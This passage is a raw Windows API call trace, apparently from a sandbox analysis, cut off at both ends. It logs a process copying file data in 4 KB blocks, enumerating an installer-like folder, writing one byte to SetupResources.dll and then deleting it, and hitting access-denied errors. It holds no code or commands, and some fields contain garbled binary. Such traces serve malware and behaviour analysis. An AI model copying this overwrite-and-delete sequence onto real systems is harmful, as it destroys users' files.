hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.748] WriteFile (in: hFile=0x418, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.755] GetLastError () returned 0x0 [0070.755] SetLastError (dwErrCode=0x0) [0070.756] GetLastError () returned 0x0 [0070.756] SetLastError (dwErrCode=0x0) [0070.756] GetLastError () returned 0x0 [0070.756] SetLastError (dwErrCode=0x0) [0070.756] GetLastError () returned 0x0 [0070.756] SetLastError (dwErrCode=0x0) [0070.756] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.756] WriteFile (in: hFile=0x418, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.756] GetLastError () returned 0x0 [0070.756] SetLastError (dwErrCode=0x0) [0070.756] GetLastError () returned 0x0 [0070.757] SetLastError (dwErrCode=0x0) [0070.757] GetLastError () returned 0x0 [0070.757] SetLastError (dwErrCode=0x0) [0070.757] GetLastError () returned 0x0 [0070.757] SetLastError (dwErrCode=0x0) [0070.757] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.757] WriteFile (in: hFile=0x418, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.757] GetLastError () returned 0x0 [0070.757] SetLastError (dwErrCode=0x0) [0070.757] GetLastError () returned 0x0 [0070.757] SetLastError (dwErrCode=0x0) [0070.758] GetLastError () returned 0x0 [0070.758] SetLastError (dwErrCode=0x0) [0070.758] GetLastError () returned 0x0 [0070.758] SetLastError (dwErrCode=0x0) [0070.758] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x758, lpOverlapped=0x0) returned 1 [0070.758] WriteFile (in: hFile=0x418, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.758] GetLastError () returned 0x0 [0070.758] SetLastError (dwErrCode=0x0) [0070.758] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0070.758] GetLastError () returned 0x0 [0070.758] SetLastError (dwErrCode=0x0) [0070.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0070.759] GetLastError () returned 0x0 [0070.759] SetLastError (dwErrCode=0x0) [0070.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0070.759] WriteFile (in: hFile=0x418, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0x760, lpOverlapped=0x0) returned 1 [0070.759] GetLastError () returned 0x0 [0070.759] SetLastError (dwErrCode=0x0) [0070.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.759] GetLastError () returned 0x0 [0070.759] SetLastError (dwErrCode=0x0) [0070.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0070.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0070.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0070.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0070.759] CloseHandle (hObject=0x418) returned 1 [0070.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0070.761] CloseHandle (hObject=0x428) returned 1 [0070.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.761] AreFileApisANSI () returned 1 [0070.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0070.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0070.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 46 [0070.761] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0070.762] GetFileType (hFile=0x428) returned 0x1 [0070.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0070.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0070.763] GetLastError () returned 0xb7 [0070.763] SetLastError (dwErrCode=0xb7) [0070.763] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0070.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0070.764] CloseHandle (hObject=0x428) returned 1 [0070.764] AreFileApisANSI () returned 1 [0070.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0070.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0070.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 46 [0070.764] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll")) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bae0 | out: hHeap=0x20000) returned 1 [0070.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0070.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.766] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f6, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="̮", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧膐\x07̧비聐虘\x08賂̧")) returned 0 [0070.766] FindClose (in: hFindFile=0x78190 | out: hFindFile=0x78190) returned 1 [0070.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0070.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0070.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0070.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0070.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0070.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0070.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0070.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0070.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0070.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.767] AreFileApisANSI () returned 1 [0070.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1053", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1053", lpUsedDefaultChar=0x0) returned 27 [0070.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0070.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0070.767] AreFileApisANSI () returned 1 [0070.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0070.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78290 [0070.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x78290, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053") returned 27 [0070.767] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053" (normalized: "c:\\588bce7c90097ed212\\1053"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.767] GetLastError () returned 0x5 [0070.767] GetLastError () returned 0x5 [0070.767] SetLastError (dwErrCode=0x5) [0070.767] GetLastError () returned 0x5 [0070.767] SetLastError (dwErrCode=0x5) [0070.767] GetLastError () returned 0x5 [0070.767] SetLastError (dwErrCode=0x5) [0070.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78290 | out: hHeap=0x20000) returned 1 [0070.770] AreFileApisANSI () returned 1 [0070.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0070.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x77fd0 [0070.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x77fd0, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053") returned 27 [0070.770] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053" (normalized: "c:\\588bce7c90097ed212\\1053"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.770] GetLastError () returned 0x5 [0070.770] GetLastError () returned 0x5 [0070.770] SetLastError (dwErrCode=0x5) [0070.770] GetLastError () returned 0x5 [0070.770] SetLastError (dwErrCode=0x5) [0070.770] GetLastError () returned 0x5 [0070.770] SetLastError (dwErrCode=0x5) [0070.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x77fd0 | out: hHeap=0x20000) returned 1 [0070.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0070.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0070.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0070.771] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1055", cAlternateFileName="")) returned 1 [0070.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0070.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0070.771] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78650 [0070.771] FindNextFileW (in: hFindFile=0x78650, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.771] FindNextFileW (in: hFindFile=0x78650, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0070.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0070.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0070.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0070.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0070.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0070.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.772] AreFileApisANSI () returned 1 [0070.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1053\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1053\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0070.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0070.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0070.773] AreFileApisANSI () returned 1 [0070.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0070.773] RtlAllocateHeap (HeapHandle=0x20000, 